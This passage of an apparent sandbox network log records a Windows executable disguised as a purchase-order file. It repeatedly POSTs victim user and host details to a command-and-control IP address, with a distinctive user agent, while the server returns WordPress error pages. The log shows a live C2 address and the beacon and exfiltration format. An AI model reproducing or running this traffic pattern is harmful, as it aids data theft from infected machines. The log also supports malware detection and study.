20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:02:58.527065039 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:02:58.527076006 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:02:58.669652939 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:02:58.674545050 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:00.883568048 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:02:59 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:00.883584976 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:03:00.883604050 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:03:00.883615017 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49723	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:01.033493042 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:01.038490057 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:03.415740967 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:03.415772915 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:03.415788889 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49725	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:03.560518026 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:03.565316916 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:05.911005974 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:05.911021948 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:05.911039114 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49726	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:06.060564041 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:06.065701962 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:08.537945032 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:06 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:08.537965059 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:08.537977934 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49727	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:08.685470104 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:08.690897942 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:11.041562080 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:09 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:11.041579962 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:11.041590929 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49728	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:11.185287952 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
